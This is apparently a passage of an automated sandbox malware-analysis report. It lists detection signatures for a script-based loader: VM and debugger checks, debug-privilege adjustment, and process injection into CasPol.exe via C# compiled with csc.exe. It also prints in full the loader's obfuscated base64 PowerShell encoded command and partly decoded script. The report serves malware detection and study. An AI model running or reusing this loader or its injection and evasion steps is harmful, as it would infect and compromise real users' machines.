Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation Jump to behavior
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 0000001A.00000002.5720812627.00000000014D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000014.00000002.2190887243.0000000008708000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeent
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20B00040 LdrInitializeThunk, 26_2_20B00040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1350000 Jump to behavior
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.0.cs Jump to dropped file
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded $Miljvrnetl = @'Im$HauStvAsoGrrFi9Ti Bi=af Af"AfVDiiRerSptAfuLoaRelKaAPtlAglReoRecPh"StAKodChdLu-BoTIdylepRieAn eq-SkTNeyUnpEseStDCaeOpfVeiPonDeiIdtStiAtoNonKe Ch@Ve"uduFosReiAknafgAs LeSOpyCysSetDieAnmPr;tiuFasApiInnopgIn BaSOpyAksUntVieMemVe.veRovuConextTaiDimLaeSt.VeIBinKotGoeCirAnoFlpYoSTheUnreivUdiGscSheRosPl;OppSyuRabFalMaiWicun AusIntPoaUptSaiGrcDo skcrilMiaWosFrsin StCGilVoaSudInoMygGteStnAreFatLo1Sp{As[GnDbelUnlBuIFymDopFaoVerTrtUn(Ph"KeuUisSuePsrFn3Ap2sk"tr)Gr]EnpPiuOpbStlsaiSpcVi SusPotHaaSktBeiSccUn DieErxPutSveArrWanIn GgiPenMatUn trCPirAaeDeaSltSteKlMBuDPlIinWUniElnstdReoVawMa(LaiAnnSktSt BeNFlvUnhIriEmeCo,AniChnPrtDi FoHLaeKlaBe,driTanFotBe RehPaaFotafcBrhTr,LaiBrnFotTe UnPToiBonMaiDi,MeiNonFjtCh duOMavHeeOrrSaiSl,FoiNanretOv PeRuneAncObiMotElapa,ReiSanCatHa PrOGopAukSnrNo,BrimanIntDa AuCRirProHacHeksk,akiRunHytMe MaAPhuNatYooAssSd,GuiAfnAptSk UnRPleAftSkrWr)Op;Gl[TaDTelHolAnIDomSnpNooaurSktOc(Gl"LiwHyiSanObmacmBa.SmdphlOnlPa"al)Ex]ArpMouSibAalTeiDicRi StsDetMeaCutBeiThcLa CoeDaxErttoeTarAmnRu AriGrnGrtLo heGLeeTatAqDEkrMyiDovjoeHorLiMDooMedEnuFulLieNoHunaVrnKadHelVeeRe(OpiklnKbtUn DaDTeiVrsTa4St0ce)Qu;Ek[anDAflLolUnIHlmEfpUnoPurYntTi(Ba"GauBlsVeeDorUd3Ar2So"Da)Gr]BepBouSkbNelUriOucRa JusamtBraFatSciFicAg IteMaxMotReeDergnnUd CliBrnAdtKu BrIPasUnDHalAsglaBVgufatAbtPsoTrnDeCovhEreStcFakBieDedTi(FoiEmnAltBe PaLTiyNosSakPiust,FoigrnUdtfu AnSImiPonAfiTjsDi9Fe4Ap)af;Sp[FlDTilsalSiISpmBrpLgoEkrPrtOv(Ul"UnAAnDKuVPlABiPHyICo3Ca2Pa.RiDDiLReLda"Sp)Pr]Sup
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded $Miljvrnetl = @'Im$HauStvAsoGrrFi9Ti Bi=af Af"AfVDiiRerSptAfuLoaRelKaAPtlAglReoRecPh"StAKodChdLu-BoTIdylepRieAn eq-SkTNeyUnpEseStDCaeOpfVeiPonDeiIdtStiAtoNonKe Ch@Ve"uduFosReiAknafgAs LeSOpyCysSetDieAnmPr;tiuFasApiInnopgIn BaSOpyAksUntVieMemVe.veRovuConextTaiDimLaeSt.VeIBinKotGoeCirAnoFlpYoSTheUnreivUdiGscSheRosPl;OppSyuRabFalMaiWicun AusIntPoaUptSaiGrcDo skcrilMiaWosFrsin StCGilVoaSudInoMygGteStnAreFatLo1Sp{As[GnDbelUnlBuIFymDopFaoVerTrtUn(Ph"KeuUisSuePsrFn3Ap2sk"tr)Gr]EnpPiuOpbStlsaiSpcVi SusPotHaaSktBeiSccUn DieErxPutSveArrWanIn GgiPenMatUn trCPirAaeDeaSltSteKlMBuDPlIinWUniElnstdReoVawMa(LaiAnnSktSt BeNFlvUnhIriEmeCo,AniChnPrtDi FoHLaeKlaBe,driTanFotBe RehPaaFotafcBrhTr,LaiBrnFotTe UnPToiBonMaiDi,MeiNonFjtCh duOMavHeeOrrSaiSl,FoiNanretOv PeRuneAncObiMotElapa,ReiSanCatHa PrOGopAukSnrNo,BrimanIntDa AuCRirProHacHeksk,akiRunHytMe MaAPhuNatYooAssSd,GuiAfnAptSk UnRPleAftSkrWr)Op;Gl[TaDTelHolAnIDomSnpNooaurSktOc(Gl"LiwHyiSanObmacmBa.SmdphlOnlPa"al)Ex]ArpMouSibAalTeiDicRi StsDetMeaCutBeiThcLa CoeDaxErttoeTarAmnRu AriGrnGrtLo heGLeeTatAqDEkrMyiDovjoeHorLiMDooMedEnuFulLieNoHunaVrnKadHelVeeRe(OpiklnKbtUn DaDTeiVrsTa4St0ce)Qu;Ek[anDAflLolUnIHlmEfpUnoPurYntTi(Ba"GauBlsVeeDorUd3Ar2So"Da)Gr]BepBouSkbNelUriOucRa JusamtBraFatSciFicAg IteMaxMotReeDergnnUd CliBrnAdtKu BrIPasUnDHalAsglaBVgufatAbtPsoTrnDeCovhEreStcFakBieDedTi(FoiEmnAltBe PaLTiyNosSakPiust,FoigrnUdtfu AnSImiPonAfiTjsDi9Fe4Ap)af;Sp[FlDTilsalSiISpmBrpLgoEkrPrtOv(Ul"UnAAnDKuVPlABiPHyICo3Ca2Pa.RiDDiLReLda"Sp)Pr]Sup Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noexit -encodedcommand "jabnagkababqahyacgbuaguadabsacaapqagaeaajwanaaoasqbtacqasabhahuauwb0ahyaqqbzag8arwbyahiargbpadkavabpacaaqgbpad0ayqbmacaaqqbmaciaqqbmafyarabpagkaugblahiauwbwahqaqqbmahuatabvageaugblagwaswbhaeeauab0agwaqqbnagwaugblag8augblagmauaboaciacgbtahqaqqblag8azabdaggazabmahualqbcag8avabjagqaeqbsaguacabsagkazqbbag4aiablahealqbtagsavaboaguaeqbvag4acabfahmazqbtahqarabdageazqbpahaazgbwaguaaqbqag8abgbeaguaaqbjagqadabtahqaaqbbahqabwboag8abgblaguaiabdaggaqabwaguaigakahuazab1aeyabwbzafiazqbpaeeaawbuageazgbnaeeacwagaewazqbtae8acab5aemaeqbzafmazqb0aeqaaqblaeeabgbtafaacga7aaoadabpahuargbhahmaqqbwagkasqbuag4abwbwagcasqbuacaaqgbhafmatwbwahkaqqbrahmavqbuahqavgbpaguatqblag0avgblac4adgblafiabwb2ahuaqwbvag4azqb4ahqavabhagkarabpag0atabhaguauwb0ac4avgblaekaqgbpag4aswbvahqarwbvaguaqwbpahiaqqbuag8argbsahaawqbvafmavaboaguavqbuahiazqbpahyavqbkagkarwbzagmauwboaguaugbvahmauabsadsacgbpahaacabtahkadqbsageaygbgageababnageaaqbxagkaywb1ag4aiabbahuacwbjag4adabqag8ayqbvahaadabtageaaqbhahiaywbeag8aiabzagsaywbyagkababnagkayqbxag8acwbgahiacwbpag4aiabtahqaqwbhagkababwag8ayqbtahuazabjag4abwbnahkazwbhahqazqbtahqabgbbahiazqbgageadabmag8amqakafmacab7aeeacwbbaecabgbeagiazqbsafuabgbsaeiadqbjaeyaeqbtaeqabwbwaeyayqbvafyazqbyafqacgb0afuabgaoafaaaaaiaesazqb1afuaaqbzafmadqblafaacwbyaeyabgazaeeacaayahmaawaiahqacgapaecacgbdaeuabgbwafaaaqb1ae8acabiafmadabsahmayqbpafmacabjafyaaqagafmadqbzafaabwb0aegayqbhafmaawb0aeiazqbpafmaywbjafuabgagaeqaaqblaeuacgb4afaadqb0afmadgblaeeacgbyafcayqbuaekabgagaecazwbpafaazqbuae0ayqb0afuabgagahqacgbdafaaaqbyaeeayqblaeqazqbhafmabab0afmadablaesababnaeiadqbeafaababjagkabgbxafuabgbpaeuababuahmadabkafiazqbvafyayqb3ae0ayqaoaewayqbpaeeabgbuafmaawb0afmadaagaeiazqboaeyabab2afuabgboaekacgbpaeuabqblaemabwasaeeabgbpaemaaabuafaacgb0aeqaaqagaeyabwbiaewayqblaesababhaeiazqasagqacgbpafqayqbuaeyabwb0aeiazqagafiazqboafaayqbhaeyabwb0ageazgbjaeiacgboafqacgasaewayqbpaeiacgbuaeyabwb0afqazqagafuabgbqafqabwbpaeiabwbuae0ayqbpaeqaaqasae0azqbpae4abwbuaeyaagb0aemaaaagagqadqbpae0ayqb2aegazqblae8acgbyafmayqbpafmabaasaeyabwbpae4ayqbuahiazqb0ae8adgagafaazqbsahuabgblaeeabgbjae8aygbpae0abwb0aeuababhahaayqasafiazqbpafmayqbuaemayqb0aegayqagafaacgbpaecabwbwaeeadqbrafmabgbyae4abwasaeiacgbpag0ayqbuaekabgb0aeqayqagaeeadqbdafiaaqbyafaacgbvaegayqbjaegazqbrahmaawasageaawbpafiadqbuaegaeqb0ae0azqagae0ayqbbafaaaab1ae4ayqb0afkabwbvaeeacwbzafmazaasaecadqbpaeeazgbuaeeacab0afmaawagafuabgbsafaabablaeeazgb0afmaawbyafcacgapae8acaa7aaoarwbsafsavabhaeqavablagwasabvagwaqqbuaekarabvag0auwbuahaatgbvag8ayqb1ahiauwbrahqatwbjacgarwbsaciatabpahcasab5agkauwbhag4atwbiag0ayqbjag0aqgbhac4auwbtagqacaboagwatwbuagwauabhaciayqbsackarqb4af0aqqbyahaatqbvahuauwbpagiaqqbhagwavablagkarabpagmaugbpacaauwb0ahmarablahqatqblageaqwb1ahqaqgblagkavaboagmatabhacaaqwbvaguarabhahgarqbyahqadabvaguavabhahiaqqbtag4augb1acaaqqbyagkarwbyag4arwbyahqatabvacaaaablaecatablaguavabhahqaqqbxaeqarqbrahiatqb5agkarabvahyaagbvaguasabvahiata
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noexit -encodedcommand "jabnagkababqahyacgbuaguadabsacaapqagaeaajwanaaoasqbtacqasabhahuauwb0ahyaqqbzag8arwbyahiargbpadkavabpacaaqgbpad0ayqbmacaaqqbmaciaqqbmafyarabpagkaugblahiauwbwahqaqqbmahuatabvageaugblagwaswbhaeeauab0agwaqqbnagwaugblag8augblagmauaboaciacgbtahqaqqblag8azabdaggazabmahualqbcag8avabjagqaeqbsaguacabsagkazqbbag4aiablahealqbtagsavaboaguaeqbvag4acabfahmazqbtahqarabdageazqbpahaazgbwaguaaqbqag8abgbeaguaaqbjagqadabtahqaaqbbahqabwboag8abgblaguaiabdaggaqabwaguaigakahuazab1aeyabwbzafiazqbpaeeaawbuageazgbnaeeacwagaewazqbtae8acab5aemaeqbzafmazqb0aeqaaqblaeeabgbtafaacga7aaoadabpahuargbhahmaqqbwagkasqbuag4abwbwagcasqbuacaaqgbhafmatwbwahkaqqbrahmavqbuahqavgbpaguatqblag0avgblac4adgblafiabwb2ahuaqwbvag4azqb4ahqavabhagkarabpag0atabhaguauwb0ac4avgblaekaqgbpag4aswbvahqarwbvaguaqwbpahiaqqbuag8argbsahaawqbvafmavaboaguavqbuahiazqbpahyavqbkagkarwbzagmauwboaguaugbvahmauabsadsacgbpahaacabtahkadqbsageaygbgageababnageaaqbxagkaywb1ag4aiabbahuacwbjag4adabqag8ayqbvahaadabtageaaqbhahiaywbeag8aiabzagsaywbyagkababnagkayqbxag8acwbgahiacwbpag4aiabtahqaqwbhagkababwag8ayqbtahuazabjag4abwbnahkazwbhahqazqbtahqabgbbahiazqbgageadabmag8amqakafmacab7aeeacwbbaecabgbeagiazqbsafuabgbsaeiadqbjaeyaeqbtaeqabwbwaeyayqbvafyazqbyafqacgb0afuabgaoafaaaaaiaesazqb1afuaaqbzafmadqblafaacwbyaeyabgazaeeacaayahmaawaiahqacgapaecacgbdaeuabgbwafaaaqb1ae8acabiafmadabsahmayqbpafmacabjafyaaqagafmadqbzafaabwb0aegayqbhafmaawb0aeiazqbpafmaywbjafuabgagaeqaaqblaeuacgb4afaadqb0afmadgblaeeacgbyafcayqbuaekabgagaecazwbpafaazqbuae0ayqb0afuabgagahqacgbdafaaaqbyaeeayqblaeqazqbhafmabab0afmadablaesababnaeiadqbeafaababjagkabgbxafuabgbpaeuababuahmadabkafiazqbvafyayqb3ae0ayqaoaewayqbpaeeabgbuafmaawb0afmadaagaeiazqboaeyabab2afuabgboaekacgbpaeuabqblaemabwasaeeabgbpaemaaabuafaacgb0aeqaaqagaeyabwbiaewayqblaesababhaeiazqasagqacgbpafqayqbuaeyabwb0aeiazqagafiazqboafaayqbhaeyabwb0ageazgbjaeiacgboafqacgasaewayqbpaeiacgbuaeyabwb0afqazqagafuabgbqafqabwbpaeiabwbuae0ayqbpaeqaaqasae0azqbpae4abwbuaeyaagb0aemaaaagagqadqbpae0ayqb2aegazqblae8acgbyafmayqbpafmabaasaeyabwbpae4ayqbuahiazqb0ae8adgagafaazqbsahuabgblaeeabgbjae8aygbpae0abwb0aeuababhahaayqasafiazqbpafmayqbuaemayqb0aegayqagafaacgbpaecabwbwaeeadqbrafmabgbyae4abwasaeiacgbpag0ayqbuaekabgb0aeqayqagaeeadqbdafiaaqbyafaacgbvaegayqbjaegazqbrahmaawasageaawbpafiadqbuaegaeqb0ae0azqagae0ayqbbafaaaab1ae4ayqb0afkabwbvaeeacwbzafmazaasaecadqbpaeeazgbuaeeacab0afmaawagafuabgbsafaabablaeeazgb0afmaawbyafcacgapae8acaa7aaoarwbsafsavabhaeqavablagwasabvagwaqqbuaekarabvag0auwbuahaatgbvag8ayqb1ahiauwbrahqatwbjacgarwbsaciatabpahcasab5agkauwbhag4atwbiag0ayqbjag0aqgbhac4auwbtagqacaboagwatwbuagwauabhaciayqbsackarqb4af0aqqbyahaatqbvahuauwbpagiaqqbhagwavablagkarabpagmaugbpacaauwb0ahmarablahqatqblageaqwb1ahqaqgblagkavaboagmatabhacaaqwbvaguarabhahgarqbyahqadabvaguavabhahiaqqbtag4augb1acaaqqbyagkarwbyag4arwbyahqatabvacaaaablaecatablaguavabhahqaqqbxaeqarqbrahiatqb5agkarabvahyaagbvaguasabvahiata Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA2B2.tmp" "c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
